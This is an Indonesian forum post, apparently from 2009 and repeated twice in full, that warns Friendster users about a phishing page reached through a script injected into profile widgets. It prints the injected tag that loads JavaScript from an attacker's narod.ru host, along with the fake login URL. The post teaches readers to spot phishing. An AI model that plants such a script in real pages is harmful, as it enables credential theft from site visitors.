dexlip
03-31-2009, 11:34 AM
Beuh.. pagi˛ udah nemu malscript..
pas saya lagi jalan˛ ke friendster temen saya, taunya di redirect ke page aneh.. miriiiiip banget ma tampilan login friendster (meskipun url di address bar tidak mencurigakan) tapi nampak agak aneh..
http://i40.tinypic.com/257duae.jpg
Buat Friendster users, harap berhati˛ kalo nemu page kyk diatas..
Tampilan di atas bukan halaman dari situs friendster.com!!
Form login di atas keliatannya meminta authentication mail dan password untuk masuk kedalam account friendster anda.. tetapi sebenarnya login anda dikirim ke link lain yang merupakan harvest site yang mengumpulkan data˛ user yang tertipu social engineering friendster phising script ini..
Apa Yang Harus Diperhatikan?
Pada gambar diatas, saya sudah menggabungkan perbedaan antara login form asli dari friendster dengan login form palsu.. Gambar yang ditandai dengan warna merah adalah login form PALSU.. Dan tanda hijau adalah login form asli dari friendster.com
Penjelasan
1. apabila anda meng-hover (menunjuk tanpa mengklik) mouse di atas tombol login #1a, maka pada statusbar browser anda akan terlihat link yang menunjukkan #1b (_http://krismelnik.narod.ru/l.html#)
SEHARUSNYA STATUSBAR MENUNJUKKAN LINK KE #1c (_http://www.friendster.com/login.php#)
2. Apabila kita menghover link EXPLORE #2a, halaman palsu ini tidak menunjukkan adanya dropdown menu..
SEHARUSNYA MUNCUL DROP DOWN MENU seperti #2b
3. Apabila kita mengklik url Friendster #3a, seharusnya gambar google menghilang dan berubah menjadi dropdown menu seperti yang ditunjukkan pada #3b
4. Apabila kita mencoba untuk mengubah bahasa yang digunakan dari #4a akan muncul pilihan bahasa..
Perbedaannya dengan halaman yang asli dapat dilihat di #4b
Analisa
Buka profile yang mengandung script tadi (saya pake firefox), sebelum kita redirect ke login form palsu, pencet escape.. abis itu klik kanan dimanapun (asal jangan diatas text link atau foto) dan pilih View Page Source
karena kita udah tau linknya, kita search dengan keyword domainnya saja (dalam kasus ini krismelnik.narod)..
Langsung keliatan tu payloadnya sebelah mana, ternyata dia nyempil di bagian widgets.. begini kira˛ codenya
<script src="http://krismelnik.narod.ru/li.js">
</script>coba kita buka javascript diatas..
saya remove.. soalnya ngga masup.. characternya buat postnya kebanyakan.. buka sendiri aja ya? ^_^
oo gitu? Jahatnyaaa..
Kesimpulan
Dari pengalaman diatas, kita harus lebih hati˛ ama login form, tidak hanya di friendster saja, tetapi semua site. iya.. SEMUA SITE
lebih baik kita repot ngecek semua link yang ada di login form suatu site daripada kita repot sesudah account kita kena hack ato disalahgunakan ama orang yang ngga bertanggung jawab.. ^_^
kalo ada yang udah pernah nemu page kyk gini dan terlanjur masukin mail ama password, cepet ganti passwordnya.. dan berdoalah mudah˛ alamat email km ngga diserang spam ^_^
add: pake third party application / addon buat nyegah phising (buat firefox banyak), thx buat f3rd1 (http://ansav.com/forum/member.php?u=18) yang udah ngingetin ^_^
dexlip out!!
edit: e iya lupa.. add fs saya oks? _http://friendster.com/twiq
JANGAN LUPA KASI TAU ORANG YANG PROFILENYA KENA MALSCRIPT SERUPA
Solusi baca di sini (http://www.ansav.com/forum/showpost.php?p=3418&postcount=16)
pas saya lagi jalan˛ ke friendster temen saya, taunya di redirect ke page aneh.. miriiiiip banget ma tampilan login friendster (meskipun url di address bar tidak mencurigakan) tapi nampak agak aneh..
http://i40.tinypic.com/257duae.jpg
Buat Friendster users, harap berhati˛ kalo nemu page kyk diatas..
Tampilan di atas bukan halaman dari situs friendster.com!!
Form login di atas keliatannya meminta authentication mail dan password untuk masuk kedalam account friendster anda.. tetapi sebenarnya login anda dikirim ke link lain yang merupakan harvest site yang mengumpulkan data˛ user yang tertipu social engineering friendster phising script ini..
Apa Yang Harus Diperhatikan?
Pada gambar diatas, saya sudah menggabungkan perbedaan antara login form asli dari friendster dengan login form palsu.. Gambar yang ditandai dengan warna merah adalah login form PALSU.. Dan tanda hijau adalah login form asli dari friendster.com
Penjelasan
1. apabila anda meng-hover (menunjuk tanpa mengklik) mouse di atas tombol login #1a, maka pada statusbar browser anda akan terlihat link yang menunjukkan #1b (_http://krismelnik.narod.ru/l.html#)
SEHARUSNYA STATUSBAR MENUNJUKKAN LINK KE #1c (_http://www.friendster.com/login.php#)
2. Apabila kita menghover link EXPLORE #2a, halaman palsu ini tidak menunjukkan adanya dropdown menu..
SEHARUSNYA MUNCUL DROP DOWN MENU seperti #2b
3. Apabila kita mengklik url Friendster #3a, seharusnya gambar google menghilang dan berubah menjadi dropdown menu seperti yang ditunjukkan pada #3b
4. Apabila kita mencoba untuk mengubah bahasa yang digunakan dari #4a akan muncul pilihan bahasa..
Perbedaannya dengan halaman yang asli dapat dilihat di #4b
Analisa
Buka profile yang mengandung script tadi (saya pake firefox), sebelum kita redirect ke login form palsu, pencet escape.. abis itu klik kanan dimanapun (asal jangan diatas text link atau foto) dan pilih View Page Source
karena kita udah tau linknya, kita search dengan keyword domainnya saja (dalam kasus ini krismelnik.narod)..
Langsung keliatan tu payloadnya sebelah mana, ternyata dia nyempil di bagian widgets.. begini kira˛ codenya
<script src="http://krismelnik.narod.ru/li.js">
</script>coba kita buka javascript diatas..
saya remove.. soalnya ngga masup.. characternya buat postnya kebanyakan.. buka sendiri aja ya? ^_^
oo gitu? Jahatnyaaa..
Kesimpulan
Dari pengalaman diatas, kita harus lebih hati˛ ama login form, tidak hanya di friendster saja, tetapi semua site. iya.. SEMUA SITE
lebih baik kita repot ngecek semua link yang ada di login form suatu site daripada kita repot sesudah account kita kena hack ato disalahgunakan ama orang yang ngga bertanggung jawab.. ^_^
kalo ada yang udah pernah nemu page kyk gini dan terlanjur masukin mail ama password, cepet ganti passwordnya.. dan berdoalah mudah˛ alamat email km ngga diserang spam ^_^
add: pake third party application / addon buat nyegah phising (buat firefox banyak), thx buat f3rd1 (http://ansav.com/forum/member.php?u=18) yang udah ngingetin ^_^
dexlip out!!
edit: e iya lupa.. add fs saya oks? _http://friendster.com/twiq
JANGAN LUPA KASI TAU ORANG YANG PROFILENYA KENA MALSCRIPT SERUPA
Solusi baca di sini (http://www.ansav.com/forum/showpost.php?p=3418&postcount=16)